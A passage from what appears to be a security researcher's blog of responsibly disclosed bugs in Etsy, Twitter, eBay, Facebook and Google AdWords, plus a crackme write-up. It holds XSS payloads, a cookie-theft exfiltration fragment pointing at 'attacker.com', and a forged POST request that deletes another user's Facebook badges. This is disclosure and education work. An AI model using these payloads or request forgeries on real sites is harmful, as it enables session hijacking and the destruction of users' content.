<div style="background: black; color: white; overflow: auto; padding: 0.2em 0.6em; width: auto;">
<table><tbody>
<tr><td><pre style="line-height: 125%; margin: 0px;"> 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28</pre>
</td><td><pre style="line-height: 125%; margin: 0px;"><span style="color: #d0d0d0;">(</span><span style="color: #6ab825; font-weight: bold;">function</span><span style="color: #d0d0d0;">(){</span>
<span style="color: #d0d0d0;">o=$(</span><span style="color: #ed9d13;">"#attachment-shim"</span><span style="color: #d0d0d0;">);</span>
<span style="color: #d0d0d0;">k=$(</span><span style="color: #ed9d13;">"#file-form"</span><span style="color: #d0d0d0;">);</span>
<span style="color: #6ab825; font-weight: bold;">var</span> <span style="color: #d0d0d0;">a=</span><span style="color: #ed9d13;">"iframe"</span><span style="color: #d0d0d0;">+(</span><span style="color: #6ab825; font-weight: bold;">new</span> <span style="color: #24909d;">Date</span><span style="color: #d0d0d0;">).getTime();</span>
<span style="color: #d0d0d0;">g=$(</span><span style="color: #ed9d13;">'<iframe id="'</span><span style="color: #d0d0d0;">+a+</span><span style="color: #ed9d13;">'" name="'</span><span style="color: #d0d0d0;">+a+</span><span style="color: #ed9d13;">'" />'</span><span style="color: #d0d0d0;">).hide();</span><span style="color: #999999; font-style: italic;">//<iframe id="iframe1334892619493" name="iframe1334892619493" /></span>
<span style="color: #d0d0d0;">k.attr(</span><span style="color: #ed9d13;">"target"</span><span style="color: #d0d0d0;">,a).after(g);</span>
<span style="color: #d0d0d0;">o.bind(</span><span style="color: #ed9d13;">"change"</span><span style="color: #d0d0d0;">,q);</span>
<span style="color: #6ab825; font-weight: bold;">if</span><span style="color: #d0d0d0;">(a=</span><span style="color: #24909d;">window</span><span style="color: #d0d0d0;">.location.hash.substring(</span><span style="color: #3677a9;">1</span><span style="color: #d0d0d0;">))</span> <span style="color: #999999; font-style: italic;">// sets a to "<img src=1 onerror=javascript:alert(1)>"</span>
<span style="color: #6ab825; font-weight: bold;">if</span><span style="color: #d0d0d0;">($(</span><span style="color: #ed9d13;">'a[name|="'</span><span style="color: #d0d0d0;">+a+</span><span style="color: #ed9d13;">'"]'</span><span style="color: #d0d0d0;">)[</span><span style="color: #3677a9;">0</span><span style="color: #d0d0d0;">])</span> <span style="color: #d0d0d0;">{</span> <span style="color: #999999; font-style: italic;">// GAME OVER we got our Executer "a[name|=\"<img src=1 onerror=javascript:alert(1)>\"]" (later will be parsed with jquery " for(s.innerHTML=m[1]+l+m[2];o--;) "</span>
<span style="color: #d0d0d0;">a=$(</span><span style="color: #ed9d13;">'a[name|="'</span><span style="color: #d0d0d0;">+a+</span><span style="color: #ed9d13;">'"]'</span><span style="color: #d0d0d0;">).parents(</span><span style="color: #ed9d13;">"div.topic"</span><span style="color: #d0d0d0;">);</span>
<span style="color: #d0d0d0;">a.find(</span><span style="color: #ed9d13;">"ol span"</span><span style="color: #d0d0d0;">).removeClass(</span><span style="color: #ed9d13;">"bottom"</span><span style="color: #d0d0d0;">);</span>
<span style="color: #d0d0d0;">a.find(</span><span style="color: #ed9d13;">".view-less"</span><span style="color: #d0d0d0;">).show();</span>
<span style="color: #d0d0d0;">a.find(</span><span style="color: #ed9d13;">".view-all"</span><span style="color: #d0d0d0;">).hide()</span>
<span style="color: #d0d0d0;">}</span>
<span style="color: #6ab825; font-weight: bold;">else</span> <span style="color: #d0d0d0;">m();</span>
<span style="color: #d0d0d0;">f=</span><span style="color: #6ab825; font-weight: bold;">true</span><span style="color: #d0d0d0;">;</span>
<span style="color: #d0d0d0;">topic_box=</span>
<span style="color: #d0d0d0;">$(</span><span style="color: #ed9d13;">"#topic"</span><span style="color: #d0d0d0;">);</span>
<span style="color: #d0d0d0;">topic_box_val=topic_box.val();</span>
<span style="color: #6ab825; font-weight: bold;">if</span><span style="color: #d0d0d0;">(topic_box_val!=</span><span style="color: #3677a9;">0</span><span style="color: #d0d0d0;">||$(</span><span style="color: #ed9d13;">"#message"</span><span style="color: #d0d0d0;">).val()!=</span><span style="color: #ed9d13;">""</span><span style="color: #d0d0d0;">){</span>
<span style="color: #d0d0d0;">d=</span><span style="color: #6ab825; font-weight: bold;">true</span><span style="color: #d0d0d0;">;</span>
<span style="color: #d0d0d0;">h=topic_box_val;</span>
<span style="color: #d0d0d0;">n()</span>
<span style="color: #d0d0d0;">}</span>
<span style="color: #d0d0d0;">})()</span>
<span style="color: #d0d0d0;">});</span>
</pre>
</td></tr>
</tbody></table>
</div>
</div>
<div style="direction: ltr; font-family: Arial, Helvetica, sans-serif;">
<br /></div>
<div class="MsoNormal" style="direction: ltr; margin: 0cm 0cm 0pt; text-align: left; unicode-bidi: embed;">
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">inside this "IF" Condition(line 10) there is a call to a vulnerable jquery function:</span></div>
<div style="font-family: Arial, Helvetica, sans-serif; line-height: normal;">
<br /></div>
<pre style="background-color: black; font-family: Arial, Helvetica, sans-serif; line-height: 16px; text-align: -webkit-auto;"><span style="color: #6ab825; font-weight: bold;">if</span><span style="color: #d0d0d0;">($(</span><span style="color: #ed9d13;">'a[name|="'</span><span style="color: #d0d0d0;">+a+</span><span style="color: #ed9d13;">'"]'</span><span style="color: #d0d0d0;">)[</span><span style="color: #3677a9;">0</span><span style="color: #d0d0d0;">])</span></pre>
<div style="font-family: Arial, Helvetica, sans-serif; line-height: normal;">
<br /></div>
<div style="font-family: Arial, Helvetica, sans-serif; line-height: normal;">
<br /></div>
<div style="font-family: Arial, Helvetica, sans-serif; line-height: normal;">
Which executes a function in jquery code that include the following line:</div>
<div style="font-family: Arial, Helvetica, sans-serif; line-height: normal;">
for(s.<b><span style="color: orange;">innerHTML</span></b>=m[1]+<b><span style="color: orange;">l</span></b>+m[2];o--;)
</div>
<div style="font-family: Arial, Helvetica, sans-serif; line-height: normal;">
<br /></div>
<div style="font-family: Arial, Helvetica, sans-serif; line-height: normal;">
after bypassing all of these conditions our payload will be stored in "l" variable like this</div>
<div style="font-family: Arial, Helvetica, sans-serif; line-height: normal;">
<br /></div>
<div style="font-family: Arial, Helvetica, sans-serif; line-height: normal;">
l = "<img src=1 onerror=javascript:alert('DOM XSS')>"</div>
<div style="font-family: Arial, Helvetica, sans-serif; line-height: normal;">
and as a result of the for loop, will be injected into the innerHTML of the page triggering the XSS.<br />
<br /></div>
<div class="MsoNormal" dir="LTR" style="direction: ltr; font-family: Arial, Helvetica, sans-serif; line-height: normal; unicode-bidi: embed;">
After I reported I noticed that, I never knew but it seems like there is an opened ticket in jquery bugs, </div>
<div class="MsoNormal" dir="LTR" style="direction: ltr; font-family: Arial, Helvetica, sans-serif; line-height: normal; unicode-bidi: embed;">
Reference: http://bugs.jquery.com/ticket/9521</div>
<div class="MsoNormal" dir="LTR" style="direction: ltr; font-family: Arial, Helvetica, sans-serif; line-height: normal; unicode-bidi: embed;">
<br /></div>
<div class="MsoNormal" dir="LTR" style="direction: ltr; font-family: Arial, Helvetica, sans-serif; line-height: normal; unicode-bidi: embed;">
</div>
<div style="font-family: Arial, Helvetica, sans-serif; line-height: normal; text-align: -webkit-auto;">
<span style="font-family: Arial;">Final Conclusions again:</span><span style="font-family: Arial;"><br />1. 1st conclusion(easy) the main javascript layer loads a second dynamic block (covered).<span style="color: red;"><br /></span></span></div>
<div style="font-family: Arial, Helvetica, sans-serif; line-height: normal; text-align: -webkit-auto;">
<span style="font-family: Arial;">2. the payload goes through the dynamic code block and inside gets through a filter to avoid DOM XSS (appears as Self-Only) (covered).</span></div>
<div style="text-align: -webkit-auto;">
<span style="color: orange; font-family: Arial;"><span style="font-family: Arial, Helvetica, sans-serif;">3. the layer 2 code block loads another layer(3) this time it is </span>jquery<span style="font-family: Arial, Helvetica, sans-serif;">, and then </span>execute<span style="font-family: Arial, Helvetica, sans-serif;"> a function that is vulnerable to DOM </span>XSS<span style="font-family: Arial, Helvetica, sans-serif;">(latest version 1.72 and older versions as well) (covered).</span></span></div>
<div style="font-family: Arial, Helvetica, sans-serif; line-height: normal;">
<br /></div>
<div style="font-family: Arial, Helvetica, sans-serif; line-height: normal;">
<br /></div>
<span style="font-family: Arial, Helvetica, sans-serif;">It is always fun when web applications are open for a vulnerability report allowing me to research over these very interesting security flows that requires combining all the pieces together.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Thank you etsy!</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Etsy Thank you list: </span><a href="http://www.etsy.com/help/article/2463">http://www.etsy.com/help/article/2463</a><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>[Ben Hayak]http://www.blogger.com/profile/09473158121408723877noreply@blogger.com5tag:blogger.com,1999:blog-7534521580510357281.post-52676475484154380222012-05-08T22:02:00.002+03:002012-05-08T22:11:29.842+03:00Twitter Vulnerability Potential XSS Worm!!! another hero?<div style="direction: ltr;">
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"></span><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">Twitter is one of the leading social networking and information sharing system these days.</span><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">I have recently discovered(and reported) a XSS vulnerability that if not reported could lead to something similar to "HyHack is my hero" ;). </span><br />
<br />
<span style="font-family: Arial;">For whoever of you who did not know, Twitter Implemented a feature called <strong>"Lists", </strong>this feature lets <strong><span style="color: red;">any user the ability of adding anyone</span>, without any terms or relation to the "follow" mechanism</strong> (they don't have to follow the attacker and vice versa)*, <strong>to his malicious XSSed list.</strong></span><br />
<br />
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">The reason of this being so High Risk stored XSS vulnerability, is that the attack potentially triggered on <strong>anyone who entered the attacker's profile "Lists" <u>using a mobile.</u></strong> after a victim got infected, the attack triggers again and infect anyone who will view the victim's <strong>"Lists"</strong> and anybody who will view theirs and so on... (only victims that will use a mobile will get infected! reminds you of something? )</span><br />
<br />
<span style="font-family: Arial; font-size: x-small;"><span style="font-family: Times New Roman; font-size: small;"><span style="font-size: x-small;">*</span>I did not test if a user can add <span style="font-family: Arial; font-size: x-small;">a</span></span> protected (locked) people to his lists. any comment on this will be appreciated. </span><br />
<br />
<span style="font-family: Arial;">PoC Picture watching the victim's profile:</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbGfvWgXUCcyNGjyMZ5Fk84w3ddss1pEIH7381FAqkTevaxlBHLN6rYgZIdGcO60D0oshUYVJhB1JqZM_eonxnVHqmOHvpFZy3QU3g02pKc0we-ttxbd63lvYqDnKHYupDxUntGCQoZXg/s1600/IMG_0803.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbGfvWgXUCcyNGjyMZ5Fk84w3ddss1pEIH7381FAqkTevaxlBHLN6rYgZIdGcO60D0oshUYVJhB1JqZM_eonxnVHqmOHvpFZy3QU3g02pKc0we-ttxbd63lvYqDnKHYupDxUntGCQoZXg/s320/IMG_0803.PNG" width="212" /></a></div>
</div>
<div style="direction: ltr;">
</div>
<div style="direction: ltr;">
<span style="font-family: Arial;">The effect of this XSS is <u>ONLY</u> on victims that use twitter on Mobile!</span></div>
<div style="direction: ltr;">
</div>
<div style="direction: ltr;">
<span style="font-family: Arial; font-size: x-small;">I most say the lists feature was not fully implemented in the browser at the time I was testing, so most of my testing performed on the "Me" tab.</span></div>
<div style="direction: ltr;">
</div>
<div style="direction: ltr;">
<span style="font-family: Arial;">Twitter did a great job resolving this vulnerability very quickly (~Day after my report), and placed my name in the Twitter Security Whitehats page(2012) later on. </span></div>
<div style="direction: ltr;">
</div>
<div style="direction: ltr;">
<span style="font-family: Arial;">I would like to thank Twitter for their work and for giving me the opportunity to report a responsible disclosure and help keeping Twitter Users safe.</span></div>
<div style="direction: ltr;">
</div>
<div style="direction: ltr;">
</div>[Ben Hayak]http://www.blogger.com/profile/09473158121408723877noreply@blogger.com0tag:blogger.com,1999:blog-7534521580510357281.post-58258879719636777612012-05-06T14:46:00.002+03:002012-05-07T14:03:46.186+03:00eBay Security 2011 & 2012 Wide Security Vulnerabilities<span style="font-family: Verdana, sans-serif; font-size: large;">eBay has different websites for different countries, As a result of a wrong implementation of some common feature in eBay websites, I've discovered a wide vulnerability that makes all of eBay's users vulnerable and at risk of being hacked!</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span><br />
<span style="color: orange;"><span style="font-family: Verdana, sans-serif;"><u><span style="font-size: large;">2012 - XSS Wide Vulnerability</span></u> </span></span><br />
<br />
<span style="font-family: Verdana, sans-serif;">The payload was injected into a script tag,</span><br />
<span style="font-family: Verdana, sans-serif;">bypassing browser's anti-xss filters, and with the ability of full session hijacking and </span><br />
<span style="font-family: Verdana, sans-serif;">hacking into eBay's users.</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiW0HEv-fMRQveWU9NTImRg1EeJpM3CM6rTceR6G3KlOunubhcVzaBLfT-7lAfY8U1qSKINFq2ZYnqSY9DFiUdVKkeTISGKUAU64o7nPaBgXZJhSINS5birfIDDg09NtzqLXFTDeDlBedQ/s1600/XSS-2012-ForBlog.PNG" target="_new" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Verdana, sans-serif;"><img border="0" height="161" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiW0HEv-fMRQveWU9NTImRg1EeJpM3CM6rTceR6G3KlOunubhcVzaBLfT-7lAfY8U1qSKINFq2ZYnqSY9DFiUdVKkeTISGKUAU64o7nPaBgXZJhSINS5birfIDDg09NtzqLXFTDeDlBedQ/s320/XSS-2012-ForBlog.PNG" width="320" /></span></a></div>
<span style="font-family: Verdana, sans-serif;"><br /></span><br />
<span style="font-family: Verdana, sans-serif;">This Time eBay did a great job fixing this vulnerability.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span><br />
<span style="color: orange; font-family: Verdana, sans-serif; font-size: large;"><u>2011 - Vulnerability in all eBay Stores</u></span><br />
<span style="font-family: Verdana, sans-serif;">in 2011 I've Discovered a vulnerability which was quite simple to exploit since user input passed through character blacklist which until my report didn't sanitized input correctly.</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3bkJOg0TqBcYzVdrKT9fK32GI8-NB0gyhxQgdf1XyGFI3bCH0PXpIrCvHoWpL_R2lAdZZoZHex3CIzjL9-RGil7xqQeJsPl9EcBmmkwJoVQB3ZXDyE98x8T3X0UpHjHXCMRKbFeELbfg/s1600/xss-ebay.jpg" target="_new" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="176" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3bkJOg0TqBcYzVdrKT9fK32GI8-NB0gyhxQgdf1XyGFI3bCH0PXpIrCvHoWpL_R2lAdZZoZHex3CIzjL9-RGil7xqQeJsPl9EcBmmkwJoVQB3ZXDyE98x8T3X0UpHjHXCMRKbFeELbfg/s320/xss-ebay.jpg" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<span style="font-size: large;"><span style="font-family: Verdana, sans-serif;"><u>2011 - Interesting Wrong Fix -</u><u> </u></span></span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span><br />
<span style="color: orange; font-family: Verdana, sans-serif; font-size: large;">Bypass: Single Parameter Splitting Injection XSS (alert isn't the goal!) </span><span style="font-family: Verdana, sans-serif;"><br /></span><br />
<span style="font-family: Verdana, sans-serif;">After my report to the manager of eBay security team, eBay came up with a fix.</span><br />
<span style="font-family: Verdana, sans-serif;">this fix contained a server side update to the character blacklist, this time they made it so it will replace the "plus(+)(%2B)" sign and occurrences of "Double Slash(//)" with nothing("") in addition to the filtering of "Brackets (<>)" ,Limiting the <strong>parameter's allowed lenght</strong> and other forbidden characters.</span><span style="font-family: Verdana, sans-serif;"><br /></span><br />
<span style="font-family: Verdana, sans-serif;">So, alert? prompt?? could you steal a cookie with alert? can you do it without generating a request to your domain? </span><br />
<span style="font-family: Verdana, sans-serif;">A request to the attacker's web listener would normally(there are some techniques to evade that, this bypass comes to show how to deal with a normal real situation) require the use of double slash "plus" sign and long payload. i.e 'http:<b style="color: red;">//</b>attacker.com/?s='<b><span style="color: red;">+</span></b>document.____ so it may seem like a partial but anti-session hijacking fix.</span><br />
<span style="font-family: Verdana, sans-serif;">After working on this filtering I came up with a modified payload which could be used to bypass the filtering and generate a requests to an attacker's website with the user's sensitive web elements/objects! (including cookie!), then I made a video of full-session hijacking.</span><br />
<span style="font-family: Verdana, sans-serif;">the reason I am posting about this issue is the interesting vector of my bypass.</span><br />
<span style="font-family: Verdana, sans-serif;">Enjoy watching:</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='425' height='344' src='https://www.youtube.com/embed/2lUcNqjAFUc?feature=player_embedded' frameborder='0'></iframe></div>
<br />
<br />
<span style="font-family: Verdana, sans-serif;">eBay did and still doing a great job as they take great care for security, I thank them for that.</span><br />
<span style="font-family: Verdana, sans-serif;">I am pleased I could help eBay's security team making eBay's users and customers a bit more secure.</span><span style="font-family: Verdana, sans-serif;"><br /></span><br />
<span style="font-family: Verdana, sans-serif;">For all of my reports (2011-2012) and security assistance to eBay, eBay gave their special appreciation ;)</span>[Ben Hayak]http://www.blogger.com/profile/09473158121408723877noreply@blogger.com0tag:blogger.com,1999:blog-7534521580510357281.post-87566986035761421672011-08-25T12:15:00.010+03:002012-04-22T14:23:25.941+03:00Uncrackable? - Exceptional Cracking<div class="MsoNormal" style="direction: ltr; text-align: left; unicode-bidi: embed;">Okay, I've been waiting for a long time for a case worth posting in my blog. I ran into this one during a search for much less interesting, standard challenges, for teaching newbies the basics of RE. </div><div class="MsoNormal" style="direction: ltr; text-align: left; unicode-bidi: embed;">This one is a bit beyond what you guys are used to, and I really want you to give it a try before you read this. If you crack it quickly then don't bother reading, if you already have 3 letters of the serial and you're stuck you should start reading from phrase F.<br />
<br />
I won't teach you how to use a debugger or how to trace the relevant RE chunk of code, there's tons of tutorials that'd do just that. You should consider this as a case study, what's interesting is the case itself and my focus would be accordingly.<br />
Background: <br />
One of the reasons I chose this crackme is because it "forces" u to focus on discovering the serial itself and not just 'patch & trash' waste of time, additionally the serial discovery is special.<br />
Goal: <br />
The goal is to find the serial key. I'll show the entire process including the method I used and why I chose to use that method, and I'll hand over the correct serial.</div><div class="MsoNormal" style="direction: ltr; text-align: left; unicode-bidi: embed;"><b>CrackMe Download Mirrors:<o:p></o:p></b></div><div class="MsoNormal" style="direction: ltr; text-align: left; unicode-bidi: embed;"><a href="http://c0rk.org/files/crackmes/CrackMe%201.0%20by%20DCrack-FOFF.rar" target="_blank">Mirror 1</a></div><div class="MsoNormal" style="direction: ltr; text-align: left; unicode-bidi: embed;"><a href="http://www.mediafire.com/?cte11imqmcz#1" target="_blank">Mirror 2</a><br />
<span class="Apple-style-span" style="font-family: Calibri, sans-serif;"><span class="Apple-style-span" style="font-size: 15px; line-height: 17px;"><br />
</span></span><br />
<a href="https://sites.google.com/site/benhayakupload/ExceptionalCracking-FOFFCrackMebyBenHayak.pdf?attredirects=0" target="_blank">Download the Full PDF Article</a><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://sites.google.com/site/benhayakupload/ExceptionalCracking-FOFFCrackMebyBenHayak.pdf?attredirects=0" imageanchor="1" style="margin-left: 1em; margin-right: 1em;" target="_blank"><img border="0" height="213" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVUnEdv3_8phkyRV-3RFV-gij0pTw4wtpc4D0dMreAe6NpE_mFFqaQL5nHyBIotr1QuJLEDq0pU2SX_KcH22swLDmVUjplQhtaI0z9bQUWHc44yJzthyphenhyphen5uw6HipLi4E4ZB5ErxIRtA7LY/s400/background.jpg" width="400" /></a></div><br />
</div>[Ben Hayak]http://www.blogger.com/profile/09473158121408723877noreply@blogger.com0tag:blogger.com,1999:blog-7534521580510357281.post-9858326061475706212011-04-08T14:13:00.013+03:002014-06-01T13:18:29.128+03:00Facebook Vulnerability - Destroy Any advertisements/badges! (permission issue)<div style="direction: ltr;">
<div style="direction: ltr;">
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">These days Facebook is one of the heaviest engine of advertising, many companies use Facebook </span><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">to promote their products and even hire people to deal just with that.</span></div>
<div style="direction: ltr;">
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">I found an attack vector that can be used by any hacker to delete badges/ads from people's/companies's accounts which will cause a damage to every blog/other website </span><br />
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">because a new bages will have a new "bid" so every website will drop the old badge.</span><br />
<br />
<div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
This issue effects the Badges feature </div>
</div>
<div style="border-collapse: collapse; direction: ltr; font-family: arial, sans-serif; font-size: 13px;">
</div>
</div>
<div style="border-collapse: collapse; direction: ltr; font-family: arial, sans-serif; font-size: 13px;">
As for: </div>
<div style="border-collapse: collapse; direction: ltr; font-family: arial, sans-serif; font-size: 13px;">
Badges Home</div>
<div style="border-collapse: collapse; direction: ltr; font-family: arial, sans-serif; font-size: 13px;">
Profile Badges</div>
<div style="border-collapse: collapse; direction: ltr; font-family: arial, sans-serif; font-size: 13px;">
Like Badges</div>
<div style="border-collapse: collapse; direction: ltr; font-family: arial, sans-serif; font-size: 13px;">
Photo Badges</div>
<div style="border-collapse: collapse; direction: ltr; font-family: arial, sans-serif; font-size: 13px;">
Page Badges</div>
<div style="border-collapse: collapse; direction: ltr; font-family: arial, sans-serif; font-size: 13px;">
<br /></div>
<div style="border-collapse: collapse; direction: ltr; font-family: arial, sans-serif; font-size: 13px;">
Vulnerability Details:</div>
<div style="border-collapse: collapse; direction: ltr; font-family: arial, sans-serif; font-size: 13px;">
A user uses the badges feature to share on blogger or any other place</div>
<div style="border-collapse: collapse; direction: ltr; font-family: arial, sans-serif; font-size: 13px;">
an attacker see the bage in some website/blog:</div>
<div style="border-collapse: collapse; direction: ltr; font-family: arial, sans-serif; font-size: 13px;">
<img src="http://badge.facebook.<wbr></wbr>com/badge/<b><span class="Apple-style-span" style="color: red;">1403380007</span></b>.<b><span class="Apple-style-span" style="color: red;">3098</span></b>.<wbr></wbr>1711802846.png" width="336" height="84" style="border: 0px;"></div>
<div style="border-collapse: collapse; direction: ltr; font-family: arial, sans-serif; font-size: 13px;">
Analyzing the Picture's name:</div>
<div style="border-collapse: collapse; direction: ltr; font-family: arial, sans-serif; font-size: 13px;">
The first number 1403380007 is the Victim's facebook owner ID</div>
<div style="border-collapse: collapse; direction: ltr; font-family: arial, sans-serif; font-size: 13px;">
(it's easy to get this id using a simple search in facebook)</div>
<div style="border-collapse: collapse; direction: ltr; font-family: arial, sans-serif; font-size: 13px;">
Now the middle number: 3098 is the bid(badge id) </div>
<div style="border-collapse: collapse; direction: ltr; font-family: arial, sans-serif; font-size: 13px;">
<br /></div>
<div style="border-collapse: collapse; direction: ltr; font-family: arial, sans-serif; font-size: 13px;">
Now what the Attacker needs is to capture a deleting badge packet</div>
<div style="border-collapse: collapse; direction: ltr; font-family: arial, sans-serif; font-size: 13px;">
and manipulate the "bid" and "owner_id"</div>
<div style="border-collapse: collapse; direction: ltr; font-family: arial, sans-serif; font-size: 13px;">
<br /></div>
<div style="border-collapse: collapse; direction: ltr; font-family: arial, sans-serif; font-size: 13px; width: 100%;">
POST /ajax/facebook-widgets/delete_badge.php?__a=1 HTTP/1.1<br />
Host: www.facebook.com<br />
Proxy-Connection: keep-alive<br />
Referer: http://www.facebook.com/badges/profile.php?status=new<br />
Origin: http://www.facebook.com<br />
X-SVN-Rev: 349667<br />
Content-Type: application/x-www-form-urlencoded<br />
Accept: */*<br />
User-Agent: Mozilla/5.0 ....<br />
Accept-Encoding: gzip,deflate,sdch<br />
Accept-Language: en-US,en;q=0.8<br />
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3<br />
Cookie: mycookie<br />
Content-Length: 137<br />
<br />
<span style="color: orange;"><b>bid</b></span>=3098&<span style="color: orange;"><b>owner_id</b></span>=1403380007&<span style="color: orange;"><b>post_form_id</b></span>=073ca00487f1c8fb8903a6ff04ed57be&<span style="color: orange;"><b>fb_dtsg</b></span>=4xsur&<span style="color: orange;"><b>lsd</b></span>&<span style="color: orange;"><b>post_form_id_source</b></span>=AsyncRequest&<span style="color: orange;"><b>confirmed</b></span>=1</div>
<div style="border-collapse: collapse; direction: ltr; font-family: arial, sans-serif; font-size: 13px;">
<br /></div>
<div style="border-collapse: collapse; direction: ltr; font-family: arial, sans-serif; font-size: 13px;">
Then a successful badge delete will be performed on the victim's account</div>
<div style="border-collapse: collapse; direction: ltr; font-family: arial, sans-serif; font-size: 13px;">
<br />
<div style="text-align: center;">
<object height="344" width="425"><param name="movie" value="http://www.youtube.com/v/OoDzPZCh6vk?hl=en&fs=1&fmt=35"></param>
<param name="allowFullScreen" value="true"></param>
<param name="allowscriptaccess" value="always"></param>
<embed src="http://www.youtube.com/v/OoDzPZCh6vk?hl=en&fs=1&fmt=35" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"></embed></object></div>
<br />
The Facebook Team Fixed this issue and thanked me by adding my name into the Facebook WhiteHats thank you list : <a href="http://www.facebook.com/whitehat">Facebook Security WhiteHats</a><br />
<br /></div>
<div style="border-collapse: collapse; direction: ltr; font-family: arial, sans-serif; font-size: 13px;">
Best Regards,</div>
<div style="border-collapse: collapse; direction: ltr; font-family: arial, sans-serif; font-size: 13px;">
Ben Hayak </div>
[Ben Hayak]http://www.blogger.com/profile/09473158121408723877noreply@blogger.com3tag:blogger.com,1999:blog-7534521580510357281.post-67478895772139481722011-04-02T18:56:00.006+03:002011-04-04T13:14:06.325+03:00Google Security Vulnerability Reward Program: Google Adwords Billing poisoning<div dir="ltr" style="text-align: left;" trbidi="on"><div dir="ltr" style="text-align: left;" trbidi="on"><div dir="ltr" trbidi="on"><div class="separator" style="clear: both; text-align: center;"></div><span class="Apple-style-span" style="color: #cccccc; font-size: large;">Overview</span><span class="Apple-style-span" style="color: #999999;">: </span><br />
<div style="direction: ltr; text-align: left;"><a href="http://www.google.com/adwords" target="_blank">Google Adwords</a> Google's Online Advertising service, boost website traffic and sales, was vulnerable to a <b>persistent </b>XSS in the Billing information.<br />
<br />
</div><div style="direction: ltr; text-align: left;"><span class="Apple-style-span" style="color: #cccccc; font-family: Arial, Helvetica, sans-serif;"><span class="Apple-style-span" style="font-size: large; line-height: 14px;">What Had to be done?</span></span><br />
<span class="Apple-style-span" style="color: #cccccc; font-family: Arial, Helvetica, sans-serif;"><span class="Apple-style-span" style="font-size: large; line-height: 14px;"></span></span><span class="Apple-style-span" style="color: #cccccc; font-family: Arial, Helvetica, sans-serif; font-size: large; line-height: 14px;"> </span></div>The Billing information details was vulnerable to a persistent xss in 5 different fields.<br />
The locations were:<br />
Business name,<br />
Contact name:<br />
both Street Addresses, and City.<br />
This attack was performed by editing the billing information with the right xss payload (no special bypass required).<br />
<b>This XSS is so persistent that it isn't possible even for the administrator to delete the poisoned billing information.</b><br />
<b><br />
</b><br />
Screen shoot:<br />
<div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTsj0bv-7IdSrB_axXb8RszyYszW0WBF8Rm-XAKDzEN035g3R7hFB8sPXRHRqu74K3B06zKY5lmNUdw9ZBizYXbVxIlXgk0sKKCDBg-FaetztjItdUUd-cdwIeqnzSkeWF1HPQQcI1HfE/s1600/google+adwords-billing.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;" target="_blank"><img border="0" height="176" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTsj0bv-7IdSrB_axXb8RszyYszW0WBF8Rm-XAKDzEN035g3R7hFB8sPXRHRqu74K3B06zKY5lmNUdw9ZBizYXbVxIlXgk0sKKCDBg-FaetztjItdUUd-cdwIeqnzSkeWF1HPQQcI1HfE/s320/google+adwords-billing.jpg" width="320" /></a></div><br />
<div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">This issue has been fixed by Google security team.</div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><br />
</div><div class="separator" style="clear: both; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; text-align: center;"></div></div><div dir="ltr" trbidi="on">I appreciate the opportunity to preserve my skills and gain some more experience<br />
